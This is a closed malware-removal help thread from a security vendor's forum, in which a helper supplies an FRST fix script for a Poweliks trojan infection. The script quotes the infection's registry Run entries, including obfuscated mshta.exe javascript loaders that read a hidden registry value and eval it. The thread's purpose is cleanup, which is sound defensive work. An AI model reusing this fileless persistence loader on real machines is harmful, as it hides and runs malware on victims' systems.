CLOSED Trojan.BAT.Poweliks.Gen (B)

Recommended Posts

Was online chatting with an emsisoft rep but they stopped responding over 4+ hours ago. 

The malware I have is consistently being identified and quarantined, repeatedly.

I ran the FRST program and have added the files here in hope I can get some further assistance.

Thank you.




Share this post

Link to post
Share on other sites


They may be offline.  Depends on where they are located and their working hours.

Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

    HKLM-x32\...\Run: [LManager] => [X]
    HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
    HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
    HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\...\Run: [*fhfucdg<*>] => "C:\Windows\system32\mshta.exe" javascript:A7vTPl2Q="ImV6Kb";s8U=new%20ActiveXObject("WScript.Shell");GueHx9H="7";nV87Dw=s8U.RegRead("HKCU\\software\\ulrk\\udnbjg");PMswlUc26="C";eval(nV87Dw);wCLbpC50 (the data entry has 10 more characters). <==== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\...\Run: [*pkmf<*>] => "C:\Users\Miyako\AppData\Local\bfd48c\e827be.lnk" <==== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
    Startup: C:\Users\Miyako\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b0c166.lnk [2016-08-10]
    Startup: C:\Users\Miyako\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bb68ed.lnk [2017-01-07]
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-2105802288-3190227250-3155975196-1000 -> DefaultScope {064BF86B-A0C8-47D8-BED5-98BED62949D2} URL =
    SearchScopes: HKU\S-1-5-21-2105802288-3190227250-3155975196-1000 -> {064BF86B-A0C8-47D8-BED5-98BED62949D2} URL =
    BHO: No Name -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> No File
    Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} -  No File
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    2018-06-05 14:08 - 2016-05-18 20:29 - 000000000 ____D C:\Users\Miyako\AppData\Local\bfd48c
    HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\Software\Classes\f46b3f: "C:\Windows\system32\mshta.exe" "javascript:McISD83="KsHnjD8x";f75i=new ActiveXObject("WScript.Shell");NX2bYFH="VYUiITa";Zw40eU=f75i.RegRead("HKCU\\software\\ulrk\\udnbjg");ooksS3c="QFNgfL";eval(Zw40eU);V7oaNMtG8="LMKuwWtf";" <==== ATTENTION
    Reg: reg delete "HKCU\software\ulrk\udnbjg" /f

  • Thanks 1

Share this post

Link to post
Share on other sites

Run a fresh scan with FRST, to confirm that everything I targeted was in fact removed.

Share this post

Link to post
Share on other sites
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.